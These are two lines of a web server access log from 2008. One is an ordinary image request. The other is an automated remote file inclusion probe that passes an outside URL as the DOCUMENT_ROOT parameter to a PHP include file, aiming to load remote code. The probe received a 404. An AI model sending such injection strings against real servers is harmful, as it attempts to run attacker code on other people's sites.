72.199.235.196 - - [20/Sep/2008:10:31:26 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-203.jpg HTTP/1.1" 200 303099 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
89.186.1.54 - - [20/Sep/2008:10:31:35 -0700] "GET /logs/access_080904.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
